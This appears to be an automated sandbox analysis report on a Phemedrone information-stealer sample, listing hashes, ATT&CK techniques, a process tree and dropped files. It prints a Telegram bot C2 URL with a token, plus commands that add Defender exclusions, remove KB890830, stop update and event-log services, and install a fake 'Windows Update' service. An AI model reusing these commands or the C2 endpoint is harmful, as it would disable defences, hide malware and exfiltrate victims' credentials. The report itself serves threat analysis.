phemedrone | ceb1bbd8e4e6d29926c8011524897693a3240a4bda727d309987a6541cd98907

General

Target

AutoBuy.exe
Size

2.8MB
MD5

ec3328cb44fb4e760b5cdef7bbbcd6f6
SHA1

d93d74a1200418ec041d4206513d511da870eaec
SHA256

ceb1bbd8e4e6d29926c8011524897693a3240a4bda727d309987a6541cd98907
SHA512

e33563185221acfaf7352a37555f8b1c4f73a962f4ae96e1dee52e8f034bc416fee22dff8bba698b596576470c0572abcf5e2dea1929f6151aac05678e78ca01
SSDEEP

49152:JxppTslWVwj1GowiT4QRW5CX42rZSkvFksV4qBNmP+X:JxpHVwIozyg3jvbVHBNI

Score

10^/10

phemedrone evasion persistence spyware stealer

Malware Config

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendMessage?chat_id=-4194654645

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 3 IoCs

Processes:

java2.exevlad.exejava.exe

pid process

2712 java2.exe
1212 vlad.exe
2860 java.exe
Loads dropped DLL 7 IoCs

Processes:

AutoBuy.exejava2.exeWerFault.exe

pid process

1988 AutoBuy.exe
2712 java2.exe
2712 java2.exe
1260
2768 WerFault.exe
2768 WerFault.exe
2768 WerFault.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com

pid	process
2712	java2.exe
1212	vlad.exe
2860	java.exe

pid	process
1988	AutoBuy.exe
2712	java2.exe
2712	java2.exe
1260
2768	WerFault.exe
2768	WerFault.exe
2768	WerFault.exe

flow	ioc
4	ip-api.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1952 sc.exe
1216 sc.exe
1584 sc.exe
1892 sc.exe
1976 sc.exe
844 sc.exe
1860 sc.exe
2268 sc.exe
2852 sc.exe
2968 sc.exe
872 sc.exe
2316 sc.exe
1628 sc.exe
700 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2768 1212 WerFault.exe vlad.exe
Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

vlad.exejava.exe

pid process

1212 vlad.exe
1212 vlad.exe
1212 vlad.exe
1212 vlad.exe
1212 vlad.exe
1212 vlad.exe
1212 vlad.exe
1212 vlad.exe
1212 vlad.exe
1212 vlad.exe
2860 java.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

vlad.exe

description pid process

Token: SeDebugPrivilege 1212 vlad.exe

pid	process
1952	sc.exe
1216	sc.exe
1584	sc.exe
1892	sc.exe
1976	sc.exe
844	sc.exe
1860	sc.exe
2268	sc.exe
2852	sc.exe
2968	sc.exe
872	sc.exe
2316	sc.exe
1628	sc.exe
700	sc.exe

pid	pid_target	process	target process
2768	1212	WerFault.exe	vlad.exe

pid	process
1212	vlad.exe
1212	vlad.exe
1212	vlad.exe
1212	vlad.exe
1212	vlad.exe
1212	vlad.exe
1212	vlad.exe
1212	vlad.exe
1212	vlad.exe
1212	vlad.exe
2860	java.exe

description	pid	process
Token: SeDebugPrivilege	1212	vlad.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

AutoBuy.exejava2.exevlad.exe

description	pid	process	target process
PID 1988 wrote to memory of 2712	1988	AutoBuy.exe	java2.exe
PID 1988 wrote to memory of 2712	1988	AutoBuy.exe	java2.exe
PID 1988 wrote to memory of 2712	1988	AutoBuy.exe	java2.exe
PID 1988 wrote to memory of 1212	1988	AutoBuy.exe	vlad.exe
PID 1988 wrote to memory of 1212	1988	AutoBuy.exe	vlad.exe
PID 1988 wrote to memory of 1212	1988	AutoBuy.exe	vlad.exe
PID 1988 wrote to memory of 1212	1988	AutoBuy.exe	vlad.exe
PID 2712 wrote to memory of 2860	2712	java2.exe	java.exe
PID 2712 wrote to memory of 2860	2712	java2.exe	java.exe
PID 2712 wrote to memory of 2860	2712	java2.exe	java.exe
PID 1212 wrote to memory of 2768	1212	vlad.exe	WerFault.exe
PID 1212 wrote to memory of 2768	1212	vlad.exe	WerFault.exe
PID 1212 wrote to memory of 2768	1212	vlad.exe	WerFault.exe
PID 1212 wrote to memory of 2768	1212	vlad.exe	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\AutoBuy.exe
"C:\Users\Admin\AppData\Local\Temp\AutoBuy.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1988
- C:\Users\Admin\AppData\Local\Temp\java2.exe
  "C:\Users\Admin\AppData\Local\Temp\java2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Users\Admin\AppData\Local\Temp\java.exe
    "C:\Users\Admin\AppData\Local\Temp\java.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2860
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Drops file in System32 directory
      PID:2796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2252
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:2256
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1584
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1952
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:2316
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:1892
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:1860
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:392
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:1100
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:1048
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:1508
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "Windows Update"
      4⤵
      Launches sc.exe
      PID:1976
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "Windows Update" binpath= "C:\ProgramData\Microsoft\update.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1628
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:700
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "Windows Update"
      4⤵
      Launches sc.exe
      PID:844
- C:\Users\Admin\AppData\Local\Temp\vlad.exe
  "C:\Users\Admin\AppData\Local\Temp\vlad.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1212
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 1812
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:2768

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2748

C:\ProgramData\Microsoft\update.exe
C:\ProgramData\Microsoft\update.exe
1⤵
PID:2888
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1164
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:108
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2852
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2268
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1216
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2968
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Privilege Escalation

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Defense Evasion

Impair Defenses

1

T1562

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\update.exe

Filesize
2.5MB

MD5
6c2a334b8a1f7571ae651ae09f039336

SHA1
a440631ad9e46e67453d555ddef7e29b62f2aaaa

SHA256
fbb7aec70c631b98440883fa9224ae4ff08374ae72cd25874781148d6155f1a0

SHA512
78d0124c9cbb69ce6e44eb9832018f959a9c3df9697bdc4e5f45870184f58ba8ae6c1efa99326da7538e9ea450365a3a3702ffd27f02114e0234f60a8aeb05de

Download Submit
C:\Users\Admin\AppData\Local\Temp\java.exe

Filesize
2.6MB

MD5
5dfe953861753222629629ba6121a0bc

SHA1
d56d226b950a773d947c7fc42dcff9788a61f4b7

SHA256
f23ec1a549bda11f572a2e58f692855a6344bce1ad683ddd730f12342e099975

SHA512
aaddb836207c42b6b795ebf8696373d9b4bc56b73cdea47141348955bd49f2d71088d1d97f06813ed5f72b40775c8c25cb23a78048ea4c223e2e4ef7f98d3e2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\vlad.exe

Filesize
512KB

MD5
0dd8757d42380787ba7162a7776f30c5

SHA1
18465ff3c76fc6c441a195b679047f9089b269de

SHA256
a6ed050ec8b21feafd3335a3396258be13a2d29601030be8f4b20c682759a2fb

SHA512
d0a8354a7af21702f70b5ef7f3440a4755b6e1bb4e39a5c821fcac34e2f019dc73243764ef037efb2ad4de05855ced057d95bc8cdfa1c74ebb27194421297c22

Download Submit
\ProgramData\Microsoft\update.exe

Filesize
2.4MB

MD5
2e75e6685ca0b820eacf7259f6c53418

SHA1
ff9a92e1838470fc4a9d6aeb8c3bb13b1fa68a65

SHA256
fe6983f8876ca1dc4dcc950e9ed20e75f5e22d14f77075d1256f06c266338683

SHA512
17c4902ed0726af8141c74232b87c262a076a65ff63d9d5a0298b475c47820ebe772be41147fafccfee338161dab8210d0a3d22fbe707b895824fac2a48d8ae9

Download Submit
\ProgramData\Microsoft\update.exe

Filesize
2.2MB

MD5
8b56866df60b0f2c6d22389ee5049eba

SHA1
23eb6887bc3dc5d3f9278e2d26c52706b8155c7d

SHA256
4d057b38289c3df732a5a33837facd07eca558d3b7f2657f36d7c1433fd9f81f

SHA512
5ed5fc5ae8363dba3ac14725e3d41ef16cc19314f264b4292190bc58c192a2abb01a3ef24f4c61f3c97f59ad4cdd2a9c47de82e47a762214d8b49075332b1577

Download Submit
\Users\Admin\AppData\Local\Temp\java2.exe

Filesize
2.1MB

MD5
fafce5048ad4b205b36844d78f036435

SHA1
9e310d6e583722889099bc46f1c8821d31881dab

SHA256
39a0270fb0a39cbcc11463681a11fdd7146254c306d79f0500775c09b0ee7eea

SHA512
c2d9d1462f9cda573cc676fbafa5b093940e8071c80fe866e33dea8b22f8462f6fb688c3eeb9a6d71f0617b6792a04191639c41ada2c5259a0e5291c63b7e39a

Download Submit
memory/952-81-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/1212-38-0x0000000073EF0000-0x00000000745DE000-memory.dmp

Filesize
6.9MB

Download
memory/1212-39-0x0000000000950000-0x0000000000990000-memory.dmp

Filesize
256KB

Download
memory/1212-47-0x0000000073EF0000-0x00000000745DE000-memory.dmp

Filesize
6.9MB

Download
memory/1212-21-0x0000000000020000-0x000000000003C000-memory.dmp

Filesize
112KB

Download
memory/1988-45-0x000007FEF5040000-0x000007FEF5A2C000-memory.dmp

Filesize
9.9MB

Download
memory/1988-0-0x000000013FD50000-0x000000014002A000-memory.dmp

Filesize
2.9MB

Download
memory/1988-1-0x000007FEF5040000-0x000007FEF5A2C000-memory.dmp

Filesize
9.9MB

Download
memory/1988-2-0x000000001BF30000-0x000000001C194000-memory.dmp

Filesize
2.4MB

Download
memory/1988-44-0x000007FEF5040000-0x000007FEF5A2C000-memory.dmp

Filesize
9.9MB

Download
memory/1988-3-0x000000001BA40000-0x000000001BAC0000-memory.dmp

Filesize
512KB

Download
memory/2656-67-0x0000000000A50000-0x0000000000A58000-memory.dmp

Filesize
32KB

Download
memory/2656-73-0x0000000001220000-0x00000000012A0000-memory.dmp

Filesize
512KB

Download
memory/2656-70-0x000007FEF46F0000-0x000007FEF508D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-71-0x0000000001220000-0x00000000012A0000-memory.dmp

Filesize
512KB

Download
memory/2656-69-0x0000000001220000-0x00000000012A0000-memory.dmp

Filesize
512KB

Download
memory/2656-68-0x000007FEF46F0000-0x000007FEF508D000-memory.dmp

Filesize
9.6MB

Download
memory/2656-66-0x0000000019ED0000-0x000000001A1B2000-memory.dmp

Filesize
2.9MB

Download
memory/2656-72-0x0000000001220000-0x00000000012A0000-memory.dmp

Filesize
512KB

Download
memory/2656-74-0x000007FEF46F0000-0x000007FEF508D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-22-0x000000001C300000-0x000000001C51E000-memory.dmp

Filesize
2.1MB

Download
memory/2712-40-0x000007FEF5040000-0x000007FEF5A2C000-memory.dmp

Filesize
9.9MB

Download
memory/2712-25-0x000000001C6D0000-0x000000001C750000-memory.dmp

Filesize
512KB

Download
memory/2712-13-0x000000013FE70000-0x0000000140090000-memory.dmp

Filesize
2.1MB

Download
memory/2712-15-0x000007FEF5040000-0x000007FEF5A2C000-memory.dmp

Filesize
9.9MB

Download
memory/2796-59-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-58-0x0000000002860000-0x00000000028E0000-memory.dmp

Filesize
512KB

Download
memory/2796-57-0x0000000002860000-0x00000000028E0000-memory.dmp

Filesize
512KB

Download
memory/2796-56-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-55-0x0000000002860000-0x00000000028E0000-memory.dmp

Filesize
512KB

Download
memory/2796-54-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-53-0x0000000002200000-0x0000000002208000-memory.dmp

Filesize
32KB

Download
memory/2796-52-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download

Resubmissions

Analysis

Sharing